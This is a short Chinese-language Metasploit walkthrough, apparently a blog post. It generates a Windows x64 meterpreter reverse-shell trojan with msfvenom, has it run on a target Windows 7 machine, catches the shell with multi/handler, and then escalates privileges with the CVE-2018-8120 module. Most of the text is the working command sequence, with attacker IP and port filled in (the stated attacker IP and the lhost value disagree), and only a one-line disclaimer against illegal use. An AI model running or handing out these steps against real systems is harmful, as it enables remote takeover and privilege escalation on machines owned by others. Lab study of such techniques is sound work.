其实我挺羡慕火车的,为什么?“他们连擦肩而过都那么久。。。。”

 

----  网易云热评

一、生成木马

目标主机:192.168.1.129(win7 x64)

攻击机:192.168.1.33 

攻击端口:12121 

生成木马:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

Metasploit -- 利用cve-2018-8120提升权限_提升权限

 

二、进入监听模块          use exploit/multi/handler 

三、设置payload反弹    set windows/x64/meterpreter/reverse_tcp

Metasploit -- 利用cve-2018-8120提升权限_提升权限_02

 

 

四、查看需要设置的参数:show options

Metasploit -- 利用cve-2018-8120提升权限_提升权限_03

五、设置攻击机ip:set lhost 192.168.1.133

六、设置攻击端口:set lport 12121

Metasploit -- 利用cve-2018-8120提升权限_提升权限_04

七、将生成的exe文件上传到目标主机并运行

八、run攻击

Metasploit -- 利用cve-2018-8120提升权限_提升权限_05

九、getuid  查看权限

十、background  后台运行

Metasploit -- 利用cve-2018-8120提升权限_提升权限_06

十一、搜索我们要利用的模块  search cve-2018-8120,并选择进入

Metasploit -- 利用cve-2018-8120提升权限_提升权限_07

十二、run,运行,并重新查看权限

Metasploit -- 利用cve-2018-8120提升权限_提升权限_08

 

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

Metasploit -- 利用cve-2018-8120提升权限_提升权限_09